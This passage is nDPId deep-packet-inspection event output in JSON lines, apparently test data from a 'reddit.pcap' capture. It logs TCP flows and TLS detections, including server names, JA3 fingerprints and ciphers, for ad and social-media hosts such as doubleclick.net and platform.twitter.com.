+00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1926,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1605291686985,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686985,"pkt":"qtsDr8lk5EKm5WPyht1gDjDtACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAN+SHGqeQBu3kB4hEAAAAAoAL9ICE+AAACBAWgBAIICkv6YkkAAAAAAQMDBw=="} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1927,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686996,"flow_last_seen":1605291686996,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686996,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1927,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1605291686996,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686996,"pkt":"qtsDr8lk5EKm5WPyht1gCh2fACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABoU7O2lbABu20FmjEAAAAAoAL9ILJdAAACBAWgBAIICnOjJUYAAAAAAQMDBw=="} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1928,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1605291687016,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687016,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgFAAAAAAAAIAIqAcsBIEmLB5kd7IUo3\/YpAbvHENPm6q63bg\/QoBJXgIMUAAACBAV4AQMDAwQCCArC1zxZVF\/gDA=="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1929,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1605291687016,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687016,"pkt":"qtsDr8lk5EKm5WPyht1gAMi0ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACACxxABu7duD9DT5uqvgBAB+wcHAAABAQgKVF\/gK8LXPFk="} 
+00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1930,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686985,"flow_last_seen":1605291687016,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687016,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.googletagservices.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1931,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1605291687024,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687024,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGhTs7YqAcsBIEmLB5kd7IUo3\/YpAbuVsAnf\/VJtBZoyoBJXgFGuAAACBAV4AQMDAwQCCArC1zxhc6MlRg=="} 
+00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1932,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1605291687024,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687024,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAA35IcYqAcsBIEmLB5kd7IUo3\/YpAbup5BqPq4R5AeISoBJXgAGtAAACBAV4AQMDAwQCCArC1zxhS\/piSQ=="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1933,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1605291687024,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687024,"pkt":"qtsDr8lk5EKm5WPyht1gCh2fACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABoU7O2lbABu20FmjIJ3\/1TgBAB+9WjAAABAQgKc6MlYsLXPGE="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1934,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1605291687024,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687024,"pkt":"qtsDr8lk5EKm5WPyht1gDjDtACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAN+SHGqeQBu3kB4hIaj6uFgBAB+4WXAAABAQgKS\/picMLXPGE="} 
+00929{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1935,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686996,"flow_last_seen":1605291687024,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"c.aaxads.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1936,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686985,"flow_last_seen":1605291687024,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"c.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1938,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686985,"flow_last_seen":1605291687060,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291687060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.googletagservices.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00991{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1949,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686985,"flow_last_seen":1605291687075,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687075,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"c.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00970{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1962,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686996,"flow_last_seen":1605291687096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687096,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"c.aaxads.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2333,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687485,"flow_last_seen":1605291687485,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687485,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2333,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1605291687485,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687485,"pkt":"qtsDr8lk5EKm5WPyht1gDGJhACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACs2RLCx1IBu5\/PXZ4AAAAAoAL9IP2VAAACBAWgBAIICruOxrcAAAAAAQMDBw=="} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2341,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1605291687512,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687512,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAKzZEsIqAcsBIEmLB5kd7IUo3\/YpAbvHUvrRnoyfz12foBJXgAjWAAACBAV4AQMDAwQCCArC1z5Fu47Gtw=="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2342,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1605291687513,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687513,"pkt":"qtsDr8lk5EKm5WPyht1gDGJhACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACs2RLCx1IBu5\/PXZ\/60Z6NgBAB+4zMAAABAQgKu47G0sLXPkU="} 
+00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2343,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687485,"flow_last_seen":1605291687513,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687513,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"securepubads.g.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2344,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687514,"flow_last_seen":1605291687514,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687514,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2344,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1605291687514,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687514,"pkt":"qtsDr8lk5EKm5WPyht1gD4BTACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXidvHABuwi2N5MAAAAAoAL9IOSoAAACBAWgBAIICiRA7pIAAAAAAQMDBw=="} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2351,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1605291687545,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687545,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleJ0qAcsBIEmLB5kd7IUo3\/YpAbu8cGxxKx0ItjeUoBJXgPGUAAACBAV4AQMDAwQCCArC1z5pJEDukg=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2353,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1605291687545,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687545,"pkt":"qtsDr8lk5EKm5WPyht1gD4BTACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXidvHABuwi2N5RscSsegBAB+3WHAAABAQgKJEDuscLXPmk="} 
+00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2355,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687514,"flow_last_seen":1605291687545,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687545,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"platform.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01011{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2356,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687485,"flow_last_seen":1605291687552,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687552,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"securepubads.g.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2382,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687514,"flow_last_seen":1605291687606,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291687606,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"platform.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01336{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2390,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291687514,"flow_last_seen":1605291687606,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291687606,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"platform.twitter.com","server_names":"platform.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, 
O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Twitter, Inc., OU=Twitter Security, CN=platform.twitter.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"2B:30:10:3B:07:2F:F2:EB:3D:08:E3:BB:45:61:F7:A3:9F:4C:A7:92"}} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2460,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687642,"flow_last_seen":1605291687642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687642,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2460,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1605291687642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687642,"pkt":"qtsDr8lk5EKm5WPyht1gDI7+ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAImmABu4PHuxgAAAAAoAL9IGTNAAACBAWgBAIICsL4XLwAAAAAAQMDBw=="} 
+00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2543,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1605291687676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687676,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIAgqAcsBIEmLB5kd7IUo3\/YpAbuaYOcfuuGDx7sZoBJXgGbFAAACBAV4AQMDAwQCCArC1z7qwvhcvA=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2544,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1605291687676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687676,"pkt":"qtsDr8lk5EKm5WPyht1gDI7+ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAImmABu4PHuxnnH7rigBAB++qzAAABAQgKwvhc38LXPuo="} +00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2546,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687642,"flow_last_seen":1605291687678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687678,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.googletagmanager.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2554,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687642,"flow_last_seen":1605291687721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291687721,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.googletagmanager.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2578,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687761,"flow_last_seen":1605291687761,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687761,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
